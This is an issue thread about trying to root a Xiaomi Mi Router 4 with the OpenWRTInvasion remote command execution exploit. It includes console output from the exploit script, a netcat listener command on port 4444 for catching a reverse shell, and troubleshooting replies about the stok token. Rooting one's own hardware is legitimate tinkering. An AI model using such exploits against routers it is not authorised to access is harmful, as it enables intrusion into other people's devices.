Trying root Mi Router 4 (R4)

Question

Trying root Mi Router 4 (R4)

Closed this issue 4 years ago · 3 comments

I tried to root the R4 version, but was unsuccesfull with 2.26.175 firmare version.

miwifi_r4_firmware_8ed47_2.26.175.bin
https://mirom.ezbox.idv.tw/en/miwifi/R4/


root@controller:/ins/OpenWRTInvasion# python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 192.168.31.1]: 192.168.0.6
stok: a***************************d
****************
router_ip_address: 192.168.0.6
stok: a****************************
****************
start uploading config file...
start exec command...
done! Now you can connect to the router using several options: (user: root, password: root)
* telnet 192.168.0.6
* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.0.6
* ftp: using a program like cyberduck
root@controller:/ins/OpenWRTInvasion# telnet 192.168.0.6
Trying 192.168.0.6...
telnet: Unable to connect to remote host: Connection refused

Any clues?

Answer 1 · 2020-12-02T13:43:16.000Z

As #21 with 0.0.1 but no success ¿Maybe the 192.168.31.1 address is mandatory?

root@controller:/ins/OpenWRTInvasion-0.0.1# python3 remote_command_execution_vulnerability.py
Start netcat on port 4444
(The way to do this in MacOS is to open a terminal and run '/usr/bin/nc -l 4444')
When you are done, press any key to continue
Router IP address: 192.168.0.6
Your IP address: 192.168.0.1
stok: aa364a422
****************
netcat_port: 4444
attacker_ip_address: 192.168.0.1
router_ip_address: 192.168.0.6
stok:aa364a4225
****************
start uploading config file ...
start exec command...
done!

Answer 2 · 2020-12-02T19:34:01.000Z

No idea, I dont have a R4 router to test, so I cant tell if the exploit works or not 😞

Did you run /usr/bin/nc -l 4444 before running python3 remote_command_execution_vulnerability.py?
I dont know about your network configuration, but I would try to keep it as simple as possible.
You can also ask in the OpenWrt forum, there is an extremely long thread about this: https://forum.openwrt.org/t/xiaomi-mi-router-4a-gigabit-edition-r4ag-r4a-gigabit-fully-supported-and-flashable-with-openwrtinvasion/36685

Answer 3 · 2020-12-02T19:36:11.000Z

I can see in the information you posted that the value for stok is aa364a4225. That is not a valid stok. Take a look at the README, where it is explained how to get the stok